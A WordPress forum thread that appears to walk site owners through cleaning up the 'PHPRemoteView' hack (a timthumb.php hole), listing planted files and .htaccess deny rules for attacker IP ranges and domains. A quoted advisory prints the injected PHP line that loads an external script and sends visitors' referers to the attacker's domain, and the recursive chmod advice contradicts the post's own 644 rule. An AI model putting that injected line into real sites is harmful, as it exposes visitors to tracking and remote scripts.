OceansDB

Make yourselve a nice .htaccess file. Do you have a ban plugin for wordpress? If yes, ban the ip + ip range.

@cbmc In your account’s root folder.

You can read the full thread here:

PHPRemoteView Hack: What it is, and how to remove it ? TechSpheria https://bit.ly/oRgMnJ

Don’t forget to delete the phony files in your WordPress installation!

There are 6 now:

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php

A new domain popped up, so you have to change your .htaccess (not inside public_html) and replace the lines with this:

order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all

If you don’t have an .htaccess file there, make one ??

@everybody please don’t forget to delete the phony files as well.

There are 6 now:

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php

A new domain popped up, so you have to change your .htaccess (not inside public_html) and replace the lines with this:

order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all

Y’all have to read my post here:

WordPress ? Support ? RSS Feed Crash https://bit.ly/ojQ4sC

Gave all the details on this bug in that topic.

It is not your plugin. Timthumb.php has a security leak. The TS (topic starter) has to update his timthumb script.

Going to quote my post for y’all

Hello,

I have/had a similar problem, not with my rss though.

You should read the following about superpuperdomain.com

What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.

I scoured the Internet and finally found a fix.

First, in your WordPress’s index.php, remove the following script added by the hack:

echo ‘<script type=”text/javascript” language=”javascript” src=”https://superpuperdomain.com/count.php?ref=&#8217;.urlencode($_SERVER[‘HTTP_REFERER’]) .'”></script>’;

Then remove three phony files added by the hackers (back up first, in case your installation actually requires these files):

/wp-admin/js/config.php
/wp-admin/common.php
/wp-content/udp.php

Do not try to open any of these files, as my antivirus sounded alarms immediately.

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run this bash command to set the correct permissions recursively for your WordPress installation:

chmod -R 0755 /wordpressdirectory

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
allow from all

The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.

Source: Techspheria

https://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/

Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php…. Just in case ??

I guess we have to keep monitoring the website TechSperia, because yesterday they said there were two phony files, today there are three.

Kind regards, OceansDB

There is another file in wp-content called udp.php.

I think just ban the IP range and do a backtrack on the website to get the direct IP adress, and ban it as well. Just in case.

If you updated your timtumb.php, they can’t place anything else on your website.

Hello,

I have/had a similar problem, not with my rss though.

You should read the following about superpuperdomain.com

What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.
I scoured the Internet and finally found a fix.

First, in your WordPress’s index.php, remove the following script added by the hack:

echo ‘<script type=”text/javascript” language=”javascript” src=”https://superpuperdomain.com/count.php?ref=&#8217;.urlencode($_SERVER[‘HTTP_REFERER’]) .'”></script>’;

Then remove two phony files added by the hackers (back up first, in case your installation actually requires these files):

/wp-admin/js/config.php
/wp-admin/common.php

Do not try to open any of these files, as my antivirus sounded alarms immediately.

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run this bash command to set the correct permissions recursively for your WordPress installation:

chmod -R 0755 /wordpressdirectory

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
allow from all

The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.

Source: Techspheria

https://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/

Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php…. Just in case ??